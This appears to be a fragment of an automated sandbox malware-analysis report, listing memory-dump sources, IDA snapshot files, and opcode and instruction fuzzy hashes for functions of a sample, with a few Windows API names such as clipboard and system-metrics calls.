                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
                                                                                                                                                                                                                                                      • Instruction ID: 26823722f3a6afcc10447d79cbf8b06261be6e3c3bcefc34e32834821d37eed0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4F0EDB5A88301BAF6248A00DD43F67B6A89755B04F301519B344790E1E5E1F559870E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 15be5673a4952075455a6c2d450438e7f22dd3e3a56e71dfeee11c81b82dc352
                                                                                                                                                                                                                                                      • Instruction ID: 91d40ab995c309ac818a54a1a1a3ff2d3bde13ed8bd1f2716a992c0db6446cf9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15be5673a4952075455a6c2d450438e7f22dd3e3a56e71dfeee11c81b82dc352
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 58F0EDB1688301BAF6248A00CD43F6BB6B49B55B04F301518B344790E0E5E2B589870E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                      • Instruction ID: fe1efda9bcc16308283c5424634e62067ac2dc8fe4a9505e7820fcb65e305570
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1F0A735B456808BE704CF38D82155BBBE2E38B324F185A7DD681D3751D639C8018609
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                      • Instruction ID: 82edae4b04cbcca041fe115de7ac49ccecf254a30b23cc25c4924dca1400b633
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 77F0A735B456808BE704CF38E82199ABBE6E397324F155A7DD641D3751D739C8018605
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
                                                                                                                                                                                                                                                      • Instruction ID: b4dc9d9987d6e593feba27a2ad1d4de2350ed7ee85686849815426946c6868d3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 61D02E2480C63E828A290F1431100BCA7220A03719B0A51E4DCC13F0C2CA62CC2722DA
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
                                                                                                                                                                                                                                                      • Instruction ID: 979b3066809f2b39c8d4e254b46c6f556eea9d2a5e27a8b6f776bea0b7d6dcb5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1AB002759486418FC644DF18D584974F7F5AB0B211F1564549589E7222D220D8408A19
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
                                                                                                                                                                                                                                                      • Instruction ID: 70204a4f19da818e306c590333116dd845209fb171f96af6639338c1a50bb7b2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 38B00254855145D6D704CF10D905575F270BF43705F10F655A40437160D3B4C248870E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
                                                                                                                                                                                                                                                      • Instruction ID: 10c72ce3a0ca8e08a8575cf423c81d1ec4165de9f21f41d416b206e48e332a4b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FDA00239E5C40197CA08CF20A854871E2BA6B5F204FA134288106B7C52D951D500854C
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                      • String ID: ($P$W$]$j$x
                                                                                                                                                                                                                                                      • API String ID: 2832541153-1642767450
                                                                                                                                                                                                                                                      • Opcode ID: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
                                                                                                                                                                                                                                                      • Instruction ID: 87f951b59d4f3b7a37799f24c3b6665980fe0be432433ecbb70728e38353d320
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8841717150C7818ED301EFBC998835FBEE09F86314F094A7DE5D986392D6788588D793
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                      • String ID: L
                                                                                                                                                                                                                                                      • API String ID: 2610073882-2909332022
                                                                                                                                                                                                                                                      • Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                      • Instruction ID: 6db3269f84c82bd33a71f1d72ed2fa7cb36160b769e4d9c9dbaa52e299ac7a35
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40413A7110CBC18ED321DB38844865EBFE16BE6220F588AADE5E5873E2D674854ACB53
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                      • String ID: L
                                                                                                                                                                                                                                                      • API String ID: 2610073882-2909332022
                                                                                                                                                                                                                                                      • Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                      • Instruction ID: bbab3ebe7db44b8be0cd0d44f3b53ab10815095ea6955019c8808ef8589ed999
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56412B7150CBC18ED331DB38845865EBFE16BE6220F188A9CE5F5873E2D6748549CB53
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MetricsSystem
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                      • Opcode ID: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
                                                                                                                                                                                                                                                      • Instruction ID: c9a1f8c58fc854c7343cd62f2f50c2794f568aca7ada01e3bbf97962732916ca
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB3183B09143048FDB40EF69E98965EBBF4BB88304F01853EE499DB360D7749948CF86